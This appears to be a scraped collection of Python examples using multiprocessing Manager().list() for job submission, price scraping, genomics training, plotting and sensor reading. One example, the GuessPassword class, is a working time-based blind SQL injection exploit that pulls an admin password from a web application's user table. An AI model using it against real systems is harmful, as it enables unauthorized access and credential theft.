Ejemplo n.º 1
0
    def run(self, job_name):
        """
        This method is used to create a job, validate it and run it on remote nodes

        :param job_name: name of the job to create
        :return:
        """
        job_metadata = self.batch_config.get('job-metadata')[job_name]
        all_job_ids = Manager().list()
        cluster_name = job_metadata['slurm_cluster_name']
        slurm_cluster = self.batch_config.get('slurm_cluster').get(cluster_name)
        path = path_expand(slurm_cluster['credentials']['sshconfigpath'])

        ssh_caller = lambda *x: self._ssh(slurm_cluster['name'], path, *x)
        scp_caller = lambda *x: self._scp(slurm_cluster['name'], path, *x)


        # TODO replace with .format
        ssh_caller('cd %s && mkdir job%s' % (job_metadata['raw_remote_path'], job_metadata['suffix']), True)
        scp_caller(job_metadata['slurm_script_path'],
                   '%s:%s' % (slurm_cluster['name'], job_metadata['remote_slurm_script_path']))
        scp_caller(job_metadata['job_script_path'],
                   '%s:%s' % (slurm_cluster['name'], job_metadata['remote_script_path']))
        ssh_caller('chmod +x', job_metadata['remote_script_path'])
        if job_metadata['input_type'].lower() == 'params+file':
            scp_caller(job_metadata['argfile_path'], '%s:%s' % (slurm_cluster['name'], job_metadata['remote_path']))

        remote_job_id = ssh_caller("cd %s && qsub %s && qstat -u $USER | tail -n 1 | awk '{print $1}'" %
                                   (job_metadata['remote_path'], job_metadata['remote_slurm_script_path']))
        remote_job_id = remote_job_id.strip('\n')
        all_job_ids.append(remote_job_id)
        print('Remote job ID: %s' % remote_job_id)
        self.batch_config.deep_set(['job-metadata', job_name, 'jobIDs'], [pid for pid in all_job_ids])
class Family(object):
    def __init__(
            self,
            last_name,
            synchronized_approach=SynchronizedListImplementation.THREAD_LOCK):
        print('Create a new family object')
        self._last_name = last_name
        self.synchronized_approach = synchronized_approach
        if self.synchronized_approach == SynchronizedListImplementation.MULTIPROCESSING_MANAGER:
            self._members = Manager().list()
        else:
            self._members = []
            self._lock = threading.Lock()
        self._cnt = 0

    def Add(self, first_name):
        # if self.synchronized_approach == SynchronizedListImplementation.THREAD_LOCK:
        #   self._lock.acquire()
        name = Name(first_name, self._last_name)
        if name not in self._members:
            self._members.append(name)
            # if self.synchronized_approach == SynchronizedListImplementation.THREAD_LOCK:
            #   self._lock.release()

    @property
    def last_name(self):
        return self._last_name

    @last_name.setter
    def last_name(self, value):
        self._last_name = value

    def __str__(self):
        return '%s Family:\n%s' % (self._last_name, '\n'.join(
            [str(name) for name in self._members]))
Ejemplo n.º 3
0
class ParserBithumb:
    def __init__(self, conf: dict):
        self.url = conf['url']
        self.currency = conf['currency']
        self.table = 'crypto'
        self.items = Manager().list()

    def parse(self, curr: str):
        response = requests.get(self.url + curr)
        result = response.json()["data"]

        item = dict(
            exchange="bithumb",
            name=curr.lower(),
            price=int(result["closing_price"]),
            volume=round(float(result["units_traded"])),
            date=convert_timestamp_mills(result['date'])
        )
        self.items.append(item)

    def get_items(self) -> List[dict]:
        procs = []
        for _index, curr in enumerate(self.currency):
            proc = Process(target=self.parse, args=(curr,))
            procs.append(proc)
            proc.start()

        for proc in procs:
            proc.join()

        return self.items
Ejemplo n.º 4
0
class MemStorage:
    def __init__(self, config):
        self.config = config
        self.measures = Manager().list()

    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc_value, traceback):
        pass

    def save(self, measure):
        self.measures.append(measure)

    def last(self):
        if len(self.measures) <= 0:
            return None

        return self.measures[-1]

    def __str__(self):
        buf = "<{} measures: [".format(self.__class__)
        for item in self.measures:
            buf += "'{}'".format(item)
        buf += "]>"

        return buf
Ejemplo n.º 5
0
def train(target, workers, title):
    parents, childs = zip(*[Pipe() for _ in range(2)])

    population = Manager().list()
    population.append(workers[0])
    population.append(workers[1])

    processes = []
    for i in range(0, 2):
        processes.append(
            Process(target=target, args=(i, population, childs[i])))

    # Start the process’s activity.
    for process in processes:
        process.start()

    params_x = []
    params_y = []

    for i in range(0, 2):
        params_store = parents[i].recv()
        params_x.append([params[0] for params in params_store])
        params_y.append([params[1] for params in params_store])

    plot(params_x, params_y, title)

    # Block the calling thread until the process whose join() method is called terminates
    for process in processes:
        process.join()

    print(population[0].performance)
    print(population[1].performance)
Ejemplo n.º 6
0
class ParserKorbit:
    def __init__(self, conf: dict):
        self.url = conf['url']
        self.currency = conf['currency']
        self.table = 'crypto'
        self.items = Manager().list()

    def parse(self, curr: str):
        params = {"currency_pair": curr}
        response = requests.get(self.url, params)
        result = response.json()

        item = dict(exchange="korbit",
                    name=curr.replace("_krw", ""),
                    price=int(result["last"]),
                    volume=round(float(result["volume"])),
                    date=convert_timestamp_mills(result['timestamp']))
        self.items.append(item)

    def get_items(self) -> List[dict]:
        procs = []
        for _index, curr in enumerate(self.currency):
            proc = Process(target=self.parse, args=(curr, ))
            procs.append(proc)
            proc.start()

        for proc in procs:
            proc.join()

        return self.items
    def sampleWithDistInfo_boundStrat_multiThread(self, num):
        """Randomly sample one configuration in the c-space first. (Get a sphere)
        Then add the sphere to result set.
        repeat:
	        sample the boundary of spheres set.
	        add new sphere to the set
        until 

        @param num: Total number of spheres as a terminate condition.                     ###################### TODO: find a terminate condition that can be used to evaluate sphere coverage
        """
        try:
            #self.mDistSamples = Manager().list();
            self.g_failTimes.value = 0;
            boundaryQueue = multiprocessing.Queue();
            dictProxy = Manager().list()
            dictProxy.append({});

            threads = [];
            threadsCount = 1;
            for i in range(0,threadsCount):
                newThread = Process( target=self.__mltithreadDistSample_boundStrat__, args=[ i, dictProxy, boundaryQueue,num ] );
                threads += [newThread];
            for i in range( 0,threadsCount ):
                threads[i].start();
            for i in range( 0,threadsCount ):
                threads[i].join();

            print "Get {0} samples".format( len(self.mDistSamples) );

        except Exception, msg:
            print "Failed to start a thread, MSG:\n\t" + str(msg);
            self.g_failTimes.value = 0;
Ejemplo n.º 8
0
def run_everything():
    setting = get_project_settings()
    # process = CrawlerProcess(setting)
    alreadyUsedWord = Manager().list()
    notYetUsedWord = Manager().list()
    roundCount = 0
    # get json, input the search value from flask to here.
    search_field = sys.argv[1]
    engine = db_connect()
    Session = sessionmaker(bind=engine)
    session = Session()
    initialNewsCount = 0
    duplicateCountBeforeBreak = 0
    while True:
        alreadyUsedWord.append(search_field)
        run_spider('thai_spider', setting, search_field, alreadyUsedWord,
                   notYetUsedWord)
        session.commit()
        newsCount = session.query(func.count(News.id)).scalar()

        print('total news in db is' + str(newsCount))
        roundCount += 1
        if newsCount - initialNewsCount < 3:
            print("Too low news now let's stop")
            duplicateCountBeforeBreak += 1
            if duplicateCountBeforeBreak >= 2:
                break
        else:
            initialNewsCount = newsCount
            duplicateCountBeforeBreak = 0
        if len(notYetUsedWord) == 0:
            break
        search_field = notYetUsedWord.pop()
Ejemplo n.º 9
0
def train(plasfile,
          chromfile,
          outdir,
          num_procs,
          ks=[3, 4, 5, 6, 7],
          lens=[1000, 10000, 100000, 500000]):
    ''' Train PlasClass models
    '''
    print("Starting PlasClass training")
    print("Getting reference lengths")
    chrom_names, chrom_lengths = get_seq_lengths(chromfile)
    plas_names, plas_lengths = get_seq_lengths(plasfile)
    for l in lens:
        coverage = 5  # TODO: make this command line option
        num_frags = get_num_frags(plas_lengths, l, coverage)

        print("Sampling {} fragments for length {}".format(num_frags, l))
        plas_start_inds = get_start_inds(plas_names, plas_lengths, num_frags,
                                         l)
        chrom_start_inds = get_start_inds(chrom_names, chrom_lengths,
                                          num_frags, l)
        plas_seqs = get_seqs(plasfile, plas_start_inds, l)
        chrom_seqs = get_seqs(chromfile, chrom_start_inds, l)

        print("Getting k-mer frequencies")
        kmer_inds, kmer_count_lens = utils.compute_kmer_inds(ks)

        pool = mp.Pool(num_procs)
        plas_list = Manager().list()
        for cur in np.arange(len(plas_seqs)):
            plas_list.append(0)
        pool.map(utils.count_kmers, [[ind,s, ks, kmer_inds, kmer_count_lens, plas_list] \
                                        for ind,s in enumerate(plas_seqs)])
        plas_freqs = np.array(plas_list)

        chrom_list = Manager().list()
        for cur in np.arange(len(chrom_seqs)):
            chrom_list.append(0)
        pool.map(utils.count_kmers, [[ind, s, ks, kmer_inds, kmer_count_lens, chrom_list] \
                                        for ind,s in enumerate(chrom_seqs)])
        chrom_freqs = np.array(chrom_list)

        pool.close()

        print("Learning classifier")
        plas_labels = np.ones(plas_freqs.shape[0])
        chrom_labels = np.zeros(chrom_freqs.shape[0])
        data = np.concatenate((plas_freqs, chrom_freqs))
        labels = np.concatenate((plas_labels, chrom_labels))
        scaler = StandardScaler().fit(data)
        scaled = scaler.transform(data)
        clf = LogisticRegression(solver='liblinear').fit(scaled, labels)

        print("Saving classifier")
        clf_name = 'm' + str(l)
        scaler_name = 's' + str(l)
        dump(clf, os.path.join(outdir, clf_name))
        dump(scaler, os.path.join(outdir, scaler_name))
Ejemplo n.º 10
0
class Painter():
    def __init__(self,
                 repr=[
                     'Ax', 'Ay', 'Az', 'Gx', 'Gy', 'Gz', 'Mx', 'My', 'Mz',
                     'Q1', 'Q2', 'Q3', 'Q4', 'Y', 'P', 'R'
                 ],
                 display=None,
                 memorySize=10,
                 ylim=[-200, 200]):
        self.n = len(repr)
        self.repr = repr
        if display is None:
            self.display = list(range(self.n))
        else:
            self.display = display
        self.memorySize = memorySize
        if isinstance(ylim, numbers.Number):
            self.ylim = (-ylim, ylim)
        else:
            self.ylim = ylim
        self.data = Manager().list(
            [np.zeros(self.n) for i in range(self.memorySize)])

        self.process = None
        self.animation = None
        self.line = [None for i in range(self.n)]

    def __call__(self, data):
        self.data.append(data)

    def plot(self):
        self.process = mp.Process(target=self._plot)
        self.process.start()

    def _plot(self):
        fig = plt.figure()
        self.animation = animation.FuncAnimation(fig=fig,
                                                 func=self._update,
                                                 init_func=self._init,
                                                 interval=20,
                                                 blit=False)
        plt.show()

    def save(self, path):
        self.animation.save(path, fps=30, extra_args=['-vcodec', 'libx264'])

    def _init(self):
        data = np.array(self.data)[-self.memorySize:]
        for i in self.display:
            self.line[i] = plt.plot(data[:, i], label=self.repr[i])[0]
        plt.xlim((0, self.memorySize))
        plt.ylim(self.ylim)
        plt.legend(loc='upper right')

    def _update(self, index):
        data = np.array(self.data)[-self.memorySize:]
        for i in self.display:
            self.line[i].set_ydata(data[:, i])
Ejemplo n.º 11
0
class Result:
    def __init__(self, urls_detail: dict, finished_urls: list,
                 failed_urls: list, config: Config, start_time, initial_time,
                 end_time):
        self.urls_detail = Manager().dict()
        self.urls_detail.update(urls_detail)
        self.finished_urls = Manager().list()
        self.finished_urls.extend(finished_urls)
        self.failed_urls = Manager().list()
        self.failed_urls.extend(failed_urls)
        self.config = copy.deepcopy(config)
        self.start_time = start_time
        self.initial_time = initial_time
        self.end_time = end_time

    def get_failed_urls(self):
        return self.failed_urls

    def get_finished_urls(self):
        return self.finished_urls

    def get_urls_detail_dict(self):
        return self.urls_detail

    def retry_failed_urls(self, *new_config: Config):
        if len(self.failed_urls) == 0:
            print("no failed urls")
            return True
        config = copy.deepcopy(new_config[0] if len(new_config) ==
                               1 else self.config)
        if len(new_config) == 1:
            config.list_config()
        retry_downloader = Downloader(config)
        result = retry_downloader.get_result(self.failed_urls)
        self.failed_urls = result.failed_urls
        for url in result.finished_urls:
            self.finished_urls.append(url)
        self.urls_detail.update(result.urls_detail)
        return True

    def show_time_cost(self):
        time_cost = '\n'.join([
            'initialize download tasks cost: {:.2f}s'.format(
                self.initial_time - self.start_time),
            'finish download task cost: {:.2f}s'.format(self.end_time -
                                                        self.initial_time),
            'total cost: {:.2f}s'.format(self.end_time - self.start_time)
        ])
        print(time_cost)

    def show_urls_status(self):
        urls_status = '|'.join([
            'finished: ' + str(len(self.finished_urls)),
            'failed: ' + str(len(self.failed_urls)),
            'total: ' + str(len(self.finished_urls) + len(self.failed_urls))
        ])
        print(urls_status)
Ejemplo n.º 12
0
class GuessPassword(object):
    def __init__(self, passwd_length, processes=6, timeout=3):
        self.result = Manager().dict()
        self.stop_flag = Manager().list()
        self.worker_list = []
        self.processes = processes
        self.timeout = timeout
        self.queue = Queue()
        self.lock = RLock()
        self.cookie = {'_SERVER': ''}
        self.passwd_length = passwd_length
        self.url = "http://localhost/general/document/index.php/send/approve/finish"
        self.payload = "1) and char(@`'`)  union select if(ord(mid(PASSWORD,{position},1))={guess_char},sleep(4),1),1 from user WHERE BYNAME = 0x61646d696e #and char(@`'`)"

        self.stop_flag.append(False)  # 这里不能写成 self.stop_flag[0] = False, 否则会提示 indexOutRange
        for _ in range(1, self.passwd_length):
            self.queue.put(_)

    def exploit(self):
        while not self.queue.empty() and not self.stop_flag[0]:
            passwd_position = self.queue.get()
            for _guess_char in range(33, 128):
                payload = self.payload.format(position=passwd_position, guess_char=_guess_char)
                exp_data = {'sid': payload}
                try:
                    res = requests.post(self.url, data=exp_data, cookies=self.cookie, timeout=self.timeout)
                except requests.ReadTimeout:
                    self.lock.acquire()
                    self.result[passwd_position] = chr(_guess_char)
                    print "Data %dth: %s" % (passwd_position, self.result[passwd_position])
                    self.lock.release()
                    break

    def run(self):

        for _ in range(self.processes):
            _worker = Process(target=self.exploit)
            # _worker.daemon = True
            _worker.start()

        try:
            while len(
                    multiprocessing.active_children()) > 2:  # 为什么不是大于0呢, 当所有工作子进程都结束之后,还有两个子进程在运行,那就是两个Manager 子进程(用于多进程共享数据);multiprocessing.active_children() 返回的是当前活动进程对象的list
                # self.lock.acquire()
                # print len(multiprocessing.active_children())
                # self.lock.release()
                time.sleep(1)
        except KeyboardInterrupt:
            self.lock.acquire()
            print 'wait for all subprocess stop......'
            self.stop_flag[0] = True
            self.lock.release()

        else:
            print self.result
            print 'finish'
Ejemplo n.º 13
0
    def _get_ruuvitag_datas(macs=[],
                            search_duratio_sec=None,
                            run_flag=RunFlag(),
                            bt_device=''):
        """
        Get data from BluetoothCommunication and handle data encoding.

        Args:
            macs (list): MAC addresses. Default empty list
            search_duratio_sec (int): Search duration in seconds. Default None
            run_flag (object): RunFlag object. Function executes while run_flag.running.
                               Default new RunFlag
            bt_device (string): Bluetooth device id
        Yields:
            tuple: MAC and State of RuuviTag sensor data
        """

        mac_blacklist = Manager().list()
        start_time = time.time()
        data_iter = ble.get_datas(mac_blacklist, bt_device)

        for ble_data in data_iter:
            # Check duration
            if search_duratio_sec and time.time(
            ) - start_time > search_duratio_sec:
                data_iter.send(StopIteration)
                break
            # Check running flag
            if not run_flag.running:
                data_iter.send(StopIteration)
                break
            # Check MAC whitelist if advertised MAC available
            if ble_data[0] and macs and not ble_data[0].upper() in map(
                    str.upper, macs):
                continue

            (data_format, data) = DataFormats.convert_data(ble_data[1])
            # Check that encoded data is valid RuuviTag data and it is sensor data
            # If data is not valid RuuviTag data add MAC to blacklist if MAC is available
            if data is not None:
                decoded = get_decoder(data_format).decode_data(data)
                if decoded is not None:
                    # If advertised MAC is missing, try to parse it from the payload
                    mac = ble_data[0] if ble_data[0] else \
                        parse_mac(data_format, decoded['mac']) if decoded['mac'] else None
                    # Check whitelist using MAC from decoded data if advertised MAC is not available
                    if mac and macs and mac.upper() not in map(
                            str.upper, macs):
                        continue
                    yield (mac, decoded)
                else:
                    log.error('Decoded data is null. MAC: %s - Raw: %s',
                              ble_data[0], ble_data[1])
            else:
                if ble_data[0]:
                    mac_blacklist.append(ble_data[0])
Ejemplo n.º 14
0
def generate_permuted_matrices(file_name, n_start, n_end, p_factor, sa_factor, use_cache):
    mat = pd.read_csv(os.path.join(constants.DATASETS_FOLDER, "{}.tsv".format(file_name)), sep='\t', index_col=0)
    p = Pool(p_factor)
    arr=Manager().list([])
    params = []
    mat[pd.isna(mat)] = 0  # MODIFY THIS LINE
    for a in np.arange(n_start,n_end):
        if use_cache and os.path.exists(os.path.join(constants.CACHE_FOLDER, file_name, "{}_perm_{}.tsv".format(file_name, a))):
            arr.append(1)
        else:
            params.append([mat, file_name, sa_factor, a, arr])

    print "permuting {}/{} matrices ({} exist in cache)".format(n_end-n_start-len(arr), n_end-n_start, len(arr))
    p.map(permute_matrix, params)
Ejemplo n.º 15
0
def run(dir_name, device_mac, script_dir, previous_info, num_proc):
    global filenames

    print("    Reading the destination info...")
    read_dst_csv(result=previous_info)
    print("    Reading common protocol and port info...")
    read_protocol_csv(script_dir + "/protocol_analysis/protocols_info.csv")

    print("    Analyzing the protocol and port of each packet...")

    results = Manager().list()
    for i in range(num_proc):
        filenames.append([])
        results.append([])

    index = 0
    for root, dirs, files in os.walk(dir_name):
        for filename in files:
            if filename.endswith(".pcap") and not filename.startswith("."):
                filenames[index].append(root + "/" + filename)
                index += 1
                if index >= num_proc:
                    index = 0

    procs = []
    pid = 0
    for i in range(num_proc):
        p = Process(target=dst_protocol_analysis,
                    args=(pid, device_mac, results))
        procs.append(p)
        p.start()
        pid += 1

    for p in procs:
        p.join()

    combined_results = results[0]

    for i in range(num_proc - 1):
        dst_pro_arr = results[i + 1]

        for dst_pro in dst_pro_arr:
            if dst_pro in combined_results:
                index = combined_results.index(dst_pro)
                combined_results[index].add_all(dst_pro.snd, dst_pro.rcv,
                                                dst_pro.p_snd, dst_pro.p_rcv)
            else:
                combined_results.append(dst_pro)

    return combined_results
Ejemplo n.º 16
0
 def cluster_to_hotspot(self, texts_list, top_k, kw_num, text_sim_threshold,
                        topic_sim_threshold) -> List[Hotspot]:
     texts_list = split_list(texts_list, self.process_num)
     model_list = [
         TextClusterModel(texts=texts_list[i],
                          vec_model=self.w2v_model,
                          kw_num=kw_num,
                          sim_threshold=text_sim_threshold)
         for i in range(self.process_num)
     ]
     shared_res_list = Manager().list([])
     p_list = [
         Process(target=m.cluster_to, args=(shared_res_list, ))
         for m in model_list
     ]
     [p.start() for p in p_list]
     [p.join() for p in p_list]
     # 3. hotspot cluster
     logger.info('{} processes finished, shared_res_list length:{}'.format(
         self.process_num, len(shared_res_list)))
     while len(shared_res_list) > 1:
         model_list = []
         p_list = []
         single_hotspots = None
         for i in range(0, len(shared_res_list), 2):
             try:
                 model_list.append(
                     HotspotClusterModel(
                         hotspots_1=shared_res_list[i],
                         hotspots_2=shared_res_list[i + 1],
                         sim_threshold=topic_sim_threshold,
                     ))
             except Exception as e:
                 single_hotspots = shared_res_list[-1]
         shared_res_list = Manager().list([])
         if single_hotspots is not None:
             shared_res_list.append(single_hotspots)
         for model in model_list:
             p_list.append(
                 Process(target=model.cluster_to, args=(shared_res_list, )))
         [p.start() for p in p_list]
         [p.join() for p in p_list]
         logger.info('Shared_res_list length:{}'.format(
             self.process_num, len(shared_res_list)))
     logger.info('Shared_res_list length:{}'.format(self.process_num,
                                                    len(shared_res_list)))
     return sorted(shared_res_list[0], key=lambda x: x.ranks,
                   reverse=True)[:top_k]
Ejemplo n.º 17
0
def LDA_topic_modeller_by_quarter_by_brand_multiprocessing(
        DF, LIST_OF_ADDITIONAL_STOP_WORDS, LIST_OF_COMMON_WORDS,
        number_of_topics_range):
    #Read in processed documents from cache, or process new document
    if os.path.isfile('pickle_files/{}.pickle'.format(
            'processed_data_by_quarter')) and os.path.isfile(
                'pickle_files/{}.pickle'.format(
                    'processed_data_by_quarter_by_brand')):
        with open(
                'pickle_files/{}.pickle'.format(
                    'processed_data_by_quarter_by_brand'), 'rb') as handle_2:
            dict_of_clean_doc_by_quarter_by_brand = pickle.load(handle_2)
    else:
        _, dict_of_clean_doc_by_quarter_by_brand = Preprocessing(
            DF, LIST_OF_ADDITIONAL_STOP_WORDS, LIST_OF_COMMON_WORDS)

    #Generate list of quarters
    DF['Date'] = pd.to_datetime(DF['Date'], infer_datetime_format=True)
    DF['Y-Quarter'] = DF['Date'].dt.to_period("Q")
    list_of_quarters = DF['Y-Quarter'].unique()

    #Limit quarters to those in 2016, 2017, 2018
    list_of_years_to_include = ['2016', '2017', '2018']
    list_of_quarters = [
        quarter for quarter in list_of_quarters
        if any(year in str(quarter) for year in list_of_years_to_include)
    ]

    combination_of_brands = []
    for quarter in list_of_quarters:
        combination_of_brands += list(
            itertools.product(
                [str(quarter)],
                dict_of_clean_doc_by_quarter_by_brand[str(quarter)].keys()))

    from multiprocessing import Pool, cpu_count, Manager
    print("{} products found... ".format(str(len(combination_of_brands))))
    list_of_arguments = [(dict_of_clean_doc_by_quarter_by_brand,
                          str(quarter_brand[0]), quarter_brand[1],
                          number_of_topics_range)
                         for quarter_brand in combination_of_brands]

    output_df = Manager().list()

    with Pool(processes=cpu_count() * 2) as pool:
        review_df = pool.starmap(build_single_LDA_model, list_of_arguments)

    output_df = output_df.append(review_df)

    pool.terminate()
    pool.join()
    output_df = pd.concat(output_df, ignore_index=True)

    writer = pd.ExcelWriter(
        'topic model results/LDA Topic Model by Quarter by Brand.xlsx')
    output_df.to_excel(writer, 'Topic Model by Quarter by Brand')
    writer.save()
    writer.close()
    return
Ejemplo n.º 18
0
class thread(threading.Thread):
    def __init__(self, c0):
        threading.Thread.__init__(self)
        self.flag = True
        self.l = Manager().list()
        self.l.append(0)
        self.l.append(1)
        self.l.append('ss')
        self.c0 = c0  #salva o final do cano

    def run(self):
        self.p = Process(target=f, args=(
            self.l,
            self.c0,
        ))  #inicia um processo em loop com o cano -vai pra linha 5
        self.p.start()
        self.p.join()
Ejemplo n.º 19
0
class Storage(object):
    def __init__(self,
                 maxsize,
                 storage_batchs,
                 num_speakers_in_batch,
                 num_threads=8):
        # use multiprocessing for threading safe
        self.storage = Manager().list()
        self.maxsize = maxsize
        self.num_speakers_in_batch = num_speakers_in_batch
        self.num_threads = num_threads
        self.ignore_last_batch = False

        if storage_batchs >= 3:
            self.ignore_last_batch = True

        # used for fast random sample
        self.safe_storage_size = self.maxsize - self.num_threads
        if self.ignore_last_batch:
            self.safe_storage_size -= self.num_speakers_in_batch

    def __len__(self):
        return len(self.storage)

    def full(self):
        return len(self.storage) >= self.maxsize

    def append(self, item):
        # if storage is full, remove an item
        if self.full():
            self.storage.pop(0)

        self.storage.append(item)

    def get_random_sample(self):
        # safe storage size considering all threads remove one item from storage in same time
        storage_size = len(self.storage) - self.num_threads

        if self.ignore_last_batch:
            storage_size -= self.num_speakers_in_batch

        return self.storage[random.randint(0, storage_size)]

    def get_random_sample_fast(self):
        """Call this method only when storage is full"""
        return self.storage[random.randint(0, self.safe_storage_size)]
Ejemplo n.º 20
0
def run():
    # make sure no old procs left running
    os.system('taskkill /F /IM plugin-container.exe')
    os.system('taskkill /F /IM firefox.exe')
    os.system('taskkill /F /IM geckodriver.exe')
    os.system('taskkill /F /IM helper.exe')

    bot_creds_list = []  # bot credentials, format: 'login:password:port'
    with open('creds_list.txt', 'r') as infile:
        for line in infile:
            line = line.strip()
            if line:
                bot_creds_list.append(line)

    # launch redis cache server
    run_redis_srv()

    # populate companies list from file
    companies_list = Manager().list()
    with open('companies_list_filtered.txt') as infile:
        for cid in infile:
            cid = cid.strip()
            if cid:
                companies_list.append(cid)

    proc_list = []

    # set to limit max bots from creds_list[]
    limit = len(bot_creds_list)

    for bot_creds in bot_creds_list[0:limit]:
        worker_proc = Process(target=worker,
                              args=(
                                  companies_list,
                                  bot_creds,
                              ))
        proc_list.append(worker_proc)

    for worker_num, worker_proc in enumerate(proc_list):
        worker_proc.start()
        print 'started worker: %s' % worker_num
        time.sleep(random.randint(55, 65))

    for worker_num, worker_proc in enumerate(proc_list):
        worker_proc.join()
        print 'joined worker: %s' % worker_num
Ejemplo n.º 21
0
class Scanner(object):
    def __init__(self):
        self.task = Manager().list()
        self.outputer = Outputer()

    def add_task(self, root_domain, domain, s_type):
        t = (root_domain, domain, s_type)
        self.task.append(t)
        print self.task
        return

    def check_network(self, domain):
        domain = "http://" + domain
        res, code, error = my_request(domain)
        if not error:
            return True
        else:
            warning = str(error)
            print warning
            return False


#	def get_ip(self, domain):
#		import socket
#		ip =  socket.getaddrinfo(domain, 'http')[0][4][0]
#		return str(ip)

    def _get_ip(self, domain):
        retry = 3
        ip = None
        num = 0
        api = "http://ip-api.com/json/%s?lang=en" % domain
        while num != retry:
            try:
                res = urllib2.urlopen(api).read()
                ip = json.loads(res)["query"].encode('utf8')
                if re.match("\d+\.\d+\.\d+\.\d+", ip):
                    break
                else:
                    num += 1
            except Exception, e:
                print e
                #print "[-] Get ip error : Network error"
                num += 1
        return ip
Ejemplo n.º 22
0
class Analyzer(object):
    def __init__(self, num_proc, path_to_data):
        self.num_proc = num_proc
        self.path_to_data = path_to_data
        self.global_lst = Manager().list()
        self.topic_lst = os.listdir(path_to_data)
        if ((len(self.topic_lst) / num_proc) -
                (len(self.topic_lst) // num_proc) != 0):
            self.size_group = (len(os.listdir(path_to_data)) // num_proc) + 1
        else:
            self.size_group = (len(os.listdir(path_to_data)) // num_proc)
        for i in range(len(self.topic_lst)): self.global_lst.append([10])

    def analyzer(self, index_process):
        for i in range(self.size_group * index_process,
                       self.size_group * (index_process + 1)):
            buffer_str = ""
            if i < len(self.topic_lst):
                filename_lst = os.listdir(self.path_to_data + '/' + self.topic_lst[i])
                for text in filename_lst:
                    with open(self.path_to_data + '/' + self.topic_lst[i] + '/' + text, 'r') as file:
                        buffer_str += file.read().lower()
                words_lst = re.split(r'\W| ', buffer_str)
                words_lst = list(set(words_lst))
                words_lst = list(filter(None, words_lst))
                self.global_lst[i] = words_lst

    def determine_topic(self, filename):
        buffer_str = ""
        with open(filename, 'r') as file:
            buffer_str = file.read().lower()
        words_lst = re.split(r'\W| ', buffer_str)
        words_lst = list(set(words_lst))
        words_lst = list(filter(None, words_lst))
        result_lst = [0 for i in range(len(self.topic_lst))]
        for index_topic in range(len(self.topic_lst)):
            result_lst[index_topic] = len(self.global_lst[index_topic]) - \
                                      len(set(self.global_lst[index_topic]) - set(words_lst))
        return self.topic_lst[result_lst.index(max(result_lst))]

    def start_process(self):
        proc_lst = [Process(target=self.analyzer, args=(i,)) for i in range(self.num_proc)]
        for i in proc_lst: i.start()
        for i in proc_lst: i.join()
Ejemplo n.º 23
0
    def _fit(self,
             input_data: InputData,
             use_fitted_operations=False,
             process_state_dict: Manager = None,
             fitted_operations: Manager = None):
        """
        Run training process in all nodes in pipeline starting with root.

        :param input_data: data used for operation training
        :param use_fitted_operations: flag defining whether use saved information about previous executions or not,
        default True
        :param process_state_dict: this dictionary is used for saving required pipeline parameters (which were changed
        inside the process) in a case of operation fit time control (when process created)
        :param fitted_operations: this list is used for saving fitted operations of pipeline nodes
        """

        # InputData was set directly to the primary nodes
        if input_data is None:
            use_fitted_operations = False
        else:
            use_fitted_operations = self._fitted_status_if_new_data(
                new_input_data=input_data, fitted_status=use_fitted_operations)

            if not use_fitted_operations or not self.fitted_on_data:
                # Don't use previous information
                self.unfit()
                self.update_fitted_on_data(input_data)

        with Timer(log=self.log) as t:
            computation_time_update = not use_fitted_operations or not self.root_node.fitted_operation or \
                                      self.computation_time is None

            train_predicted = self.root_node.fit(input_data=input_data)
            if computation_time_update:
                self.computation_time = round(t.minutes_from_start, 3)

        if process_state_dict is None:
            return train_predicted
        else:
            process_state_dict['train_predicted'] = train_predicted
            process_state_dict['computation_time'] = self.computation_time
            process_state_dict['fitted_on_data'] = self.fitted_on_data
            for node in self.nodes:
                fitted_operations.append(node.fitted_operation)
Ejemplo n.º 24
0
class Parallel(object):
    """
    generate samples from some data structure
    """
    def __init__(self, objective, objective_kwargs):
        self.objective = objective
        self.objective_kwargs = objective_kwargs
        return

    def run(self, iterable_obj, n_jobs=-1):

        try:
            iter(iterable_obj)
        except Exception as e:
            raise Exception(e.__str__())

        self.X = Manager().list()
        if n_jobs == -1:
            import multiprocessing
            n_jobs = multiprocessing.cpu_count()
        pool = Pool(n_jobs)

        params = []
        for item in iterable_obj:
            params.append((item, ))
        pool.starmap(self.worker, params)
        pool.close()
        pool.join()
        return list(self.X)

    def worker(self, item):
        try:
            d_ = self.objective(item, **self.objective_kwargs)

            if type(d_) == dict:
                self.X.append(d_)
            elif type(d_) == list:
                for d_i_ in d_:
                    self.X.append(d_i_)
            else:
                'objective not return a dict object or a dict list'
        except Exception as e:
            raise Exception()
Ejemplo n.º 25
0
def amazon_scrape_to_df_multithreading(keyword):
    """
    Function:
    ---------

        (1) amazon_scrape_to_df_multithreading calls the amazon_df_one_asin, and iterates through all available ASINs, returning a Pandas DataFrame

        (2) Output DataFrame is also saved as a pickle file, for caching purposes.

        (3) WITH MULTIPROCESSING

    Args:
    -----
        (1) keyword (str): Search term defined by the user

    Returns:
    --------
        output_df (pandas DataFrame): pandas DataFrame with the following columns:
            (a) Name
            
            (b) Rating
            
            (c) User Comment
            
            (d) Date
            
            (e) Brand
            
            (f) Usefulness
            
            (g) Source
    """
    # Fake User Agent library is used, so that the User Agent is randomized, so as to be able to circumvent IP bans.
    # It will make the code run slightly slower, but we are able to yield better results.
    ua = UserAgent(cache=False, verify_ssl=False)

    list_of_asin = amazon_get_asin(keyword, ua.random)

    print("{} products found... ".format(str(len(list_of_asin))))
    list_of_asin_and_ua = [(asin, ua.random) for asin in list_of_asin]

    output_df = Manager().list()

    with Pool(processes=cpu_count() * 2) as pool:
        review_df = pool.starmap(amazon_df_one_asin, list_of_asin_and_ua)

    output_df = output_df.append(review_df)
    pool.terminate()
    pool.join()

    output_df = pd.concat(output_df, ignore_index=True)

    with open('pickle_files/amazon_web_scrape.pickle', 'wb') as handle:
        pickle.dump(output_df, handle, protocol=pickle.HIGHEST_PROTOCOL)
    return output_df
Ejemplo n.º 26
0
    def _get_ruuvitag_datas(macs=[], search_duratio_sec=None, run_flag=RunFlag(), bt_device=''):
        """
        Get data from BluetoothCommunication and handle data encoding.

        Args:
            macs (list): MAC addresses. Default empty list
            search_duratio_sec (int): Search duration in seconds. Default None
            run_flag (object): RunFlag object. Function executes while run_flag.running.
                               Default new RunFlag
            bt_device (string): Bluetooth device id
        Yields:
            tuple: MAC and State of RuuviTag sensor data
        """

        mac_blacklist = Manager().list()
        start_time = time.time()
        data_iter = ble.get_datas(mac_blacklist, bt_device)

        for ble_data in data_iter:
            # Check duration
